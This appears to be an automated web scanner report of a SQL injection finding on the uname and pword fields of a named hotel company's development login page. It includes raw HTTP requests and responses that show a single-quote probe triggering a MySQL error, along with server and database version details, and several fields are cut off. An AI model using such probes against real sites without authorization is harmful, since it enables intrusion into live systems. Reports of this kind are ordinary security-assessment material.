1.1. http://www.kimptonhotels.com/development/login.aspx [pword parameter]
1.2. http://www.kimptonhotels.com/development/login.aspx [uname parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/login.aspx |
POST /development/login.aspx HTTP/1.1 Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: ASP.NET_SessionId Content-Type: application/x-www-form Content-Length: 260 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Connection: close Date: Tue, 12 Oct 2010 19:52:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4583 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> <link rel="stylesheet" type="text/css" href="../_css/global.css" <style type="text/css"> <!-- body { background: #FFFFFF; } --> </style> </head> <body> <form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5N </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['ctl00']; if (!theForm) { theForm = document.ctl00; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET theForm.__EVENTARGUMENT theForm.submit(); } } //]]> </script> <script src="/WebResource.axd?d= <script src="/WebResource.axd?d <script type="text/javascript"> //<![CDATA[ function WebForm_OnSubmit() { if (typeof(ValidatorOnSubmit return true; } //]]> </script> <div> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0 </div> <table border="0" width="600" valign="top" class="kim11"> <tr> <td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br /> <p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td> </tr> <tr> <td colspan="2"><br />We could not process your request.<br />ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83 </tr> <tr> <td width="100"> <p style="margin: 10px 0 0 6px;"> <strong>Username</strong> <span id="runame" class="required" style="color:Red </p> </td> <td><input name="uname" type="text" value="Peter Wiener" id="uname" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr valign="top"> <td width="100"> <p style="margin: 0 0 0 6px;"> <strong>Password</strong> <span id="rpword" class="required" style="color:Red </p> </td> <td><input name="pword" type="text" value="555-555-0199 </tr> <tr> <td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript </tr> </table> <script type="text/javascript"> //<![CDATA[ var Page_Validators = new Array(document.getEl //]]> </script> <script type="text/javascript"> //<![CDATA[ var runame = document.all ? document.all["runame"] : document.getElementById( runame.controltovalidate = "uname"; runame.errormessage = "Required"; runame.evaluationfunction = "RequiredFieldValida runame.initialvalue = ""; var rpword = document.all ? document.all["rpword"] : document.getElementById( rpword.controltovalidate = "pword"; rpword.errormessage = "Required"; rpword.evaluationfunction = "RequiredFieldValida rpword.initialvalue = ""; //]]> </script> <script type="text/javascript"> //<![CDATA[ var Page_ValidationActive = false; if (typeof(ValidatorOnLoad) == "function") { ValidatorOnLoad(); } function ValidatorOnSubmit() { if (Page_ValidationActive) { return ValidatorCommonOnSubmit() } else { return true; } } //]]> </script> </form> </body> </html> |
POST /development/login.aspx HTTP/1.1 Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: ASP.NET_SessionId Content-Type: application/x-www-form Content-Length: 260 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Connection: close Date: Tue, 12 Oct 2010 19:52:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4346 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> <link rel="stylesheet" type="text/css" href="../_css/global.css" <style type="text/css"> <!-- body { background: #FFFFFF; } --> </style> </head> <body> <form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5N </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['ctl00']; if (!theForm) { theForm = document.ctl00; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET theForm.__EVENTARGUMENT theForm.submit(); } } //]]> </script> <script src="/WebResource.axd?d= <script src="/WebResource.axd?d <script type="text/javascript"> //<![CDATA[ function WebForm_OnSubmit() { if (typeof(ValidatorOnSubmit return true; } //]]> </script> <div> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0 </div> <table border="0" width="600" valign="top" class="kim11"> <tr> <td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br /> <p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td> </tr> <tr> <td colspan="2">Your username and/or password was not found in the system.</td> </tr> <tr> <td width="100"> <p style="margin: 10px 0 0 6px;"> <strong>Username</strong> <span id="runame" class="required" style="color:Red </p> </td> <td><input name="uname" type="text" value="Peter Wiener" id="uname" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr valign="top"> <td width="100"> <p style="margin: 0 0 0 6px;"> <strong>Password</strong> <span id="rpword" class="required" style="color:Red </p> </td> <td><input name="pword" type="text" value="555-555-0199 </tr> <tr> <td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript </tr> </table> <script type="text/javascript"> //<![CDATA[ var Page_Validators = new Array(document.getEl //]]> </script> <script type="text/javascript"> //<![CDATA[ var runame = document.all ? document.all["runame"] : document.getElementById( runame.controltovalidate = "uname"; runame.errormessage = "Required"; runame.evaluationfunction = "RequiredFieldValida runame.initialvalue = ""; var rpword = document.all ? document.all["rpword"] : document.getElementById( rpword.controltovalidate = "pword"; rpword.errormessage = "Required"; rpword.evaluationfunction = "RequiredFieldValida rpword.initialvalue = ""; //]]> </script> <script type="text/javascript"> //<![CDATA[ var Page_ValidationActive = false; if (typeof(ValidatorOnLoad) == "function") { ValidatorOnLoad(); } function ValidatorOnSubmit() { if (Page_ValidationActive) { return ValidatorCommonOnSubmit() } else { return true; } } //]]> </script> </form> </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/login.aspx |
POST /development/login.aspx HTTP/1.1 Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: ASP.NET_SessionId Content-Type: application/x-www-form Content-Length: 260 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Connection: close Date: Tue, 12 Oct 2010 19:52:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4581 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> <link rel="stylesheet" type="text/css" href="../_css/global.css" <style type="text/css"> <!-- body { background: #FFFFFF; } --> </style> </head> <body> <form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5N </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['ctl00']; if (!theForm) { theForm = document.ctl00; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET theForm.__EVENTARGUMENT theForm.submit(); } } //]]> </script> <script src="/WebResource.axd?d= <script src="/WebResource.axd?d <script type="text/javascript"> //<![CDATA[ function WebForm_OnSubmit() { if (typeof(ValidatorOnSubmit return true; } //]]> </script> <div> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0 </div> <table border="0" width="600" valign="top" class="kim11"> <tr> <td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br /> <p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td> </tr> <tr> <td colspan="2"><br />We could not process your request.<br />ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83 </tr> <tr> <td width="100"> <p style="margin: 10px 0 0 6px;"> <strong>Username</strong> <span id="runame" class="required" style="color:Red </p> </td> <td><input name="uname" type="text" value="Peter Wiener'" id="uname" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr valign="top"> <td width="100"> <p style="margin: 0 0 0 6px;"> <strong>Password</strong> <span id="rpword" class="required" style="color:Red </p> </td> <td><input name="pword" type="text" value="555-555-0199 </tr> <tr> <td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript </tr> </table> <script type="text/javascript"> //<![CDATA[ var Page_Validators = new Array(document.getEl //]]> </script> <script type="text/javascript"> //<![CDATA[ var runame = document.all ? document.all["runame"] : document.getElementById( runame.controltovalidate = "uname"; runame.errormessage = "Required"; runame.evaluationfunction = "RequiredFieldValida runame.initialvalue = ""; var rpword = document.all ? document.all["rpword"] : document.getElementById( rpword.controltovalidate = "pword"; rpword.errormessage = "Required"; rpword.evaluationfunction = "RequiredFieldValida rpword.initialvalue = ""; //]]> </script> <script type="text/javascript"> //<![CDATA[ var Page_ValidationActive = false; if (typeof(ValidatorOnLoad) == "function") { ValidatorOnLoad(); } function ValidatorOnSubmit() { if (Page_ValidationActive) { return ValidatorCommonOnSubmit() } else { return true; } } //]]> </script> </form> </body> </html> |
POST /development/login.aspx HTTP/1.1 Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: ASP.NET_SessionId Content-Type: application/x-www-form Content-Length: 260 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Connection: close Date: Tue, 12 Oct 2010 19:52:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4346 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> <link rel="stylesheet" type="text/css" href="../_css/global.css" <style type="text/css"> <!-- body { background: #FFFFFF; } --> </style> </head> <body> <form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5N </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['ctl00']; if (!theForm) { theForm = document.ctl00; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET theForm.__EVENTARGUMENT theForm.submit(); } } //]]> </script> <script src="/WebResource.axd?d= <script src="/WebResource.axd?d <script type="text/javascript"> //<![CDATA[ function WebForm_OnSubmit() { if (typeof(ValidatorOnSubmit return true; } //]]> </script> <div> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0 </div> <table border="0" width="600" valign="top" class="kim11"> <tr> <td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br /> <p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td> </tr> <tr> <td colspan="2">Your username and/or password was not found in the system.</td> </tr> <tr> <td width="100"> <p style="margin: 10px 0 0 6px;"> <strong>Username</strong> <span id="runame" class="required" style="color:Red </p> </td> <td><input name="uname" type="text" value="Peter Wiener''" id="uname" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr valign="top"> <td width="100"> <p style="margin: 0 0 0 6px;"> <strong>Password</strong> <span id="rpword" class="required" style="color:Red </p> </td> <td><input name="pword" type="text" value="555-555-0199 </tr> <tr> <td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript </tr> </table> <script type="text/javascript"> //<![CDATA[ var Page_Validators = new Array(document.getEl //]]> </script> <script type="text/javascript"> //<![CDATA[ var runame = document.all ? document.all["runame"] : document.getElementById( runame.controltovalidate = "uname"; runame.errormessage = "Required"; runame.evaluationfunction = "RequiredFieldValida runame.initialvalue = ""; var rpword = document.all ? document.all["rpword"] : document.getElementById( rpword.controltovalidate = "pword"; rpword.errormessage = "Required"; rpword.evaluationfunction = "RequiredFieldValida rpword.initialvalue = ""; //]]> </script> <script type="text/javascript"> //<![CDATA[ var Page_ValidationActive = false; if (typeof(ValidatorOnLoad) == "function") { ValidatorOnLoad(); } function ValidatorOnSubmit() { if (Page_ValidationActive) { return ValidatorCommonOnSubmit() } else { return true; } } //]]> </script> </form> </body> </html> |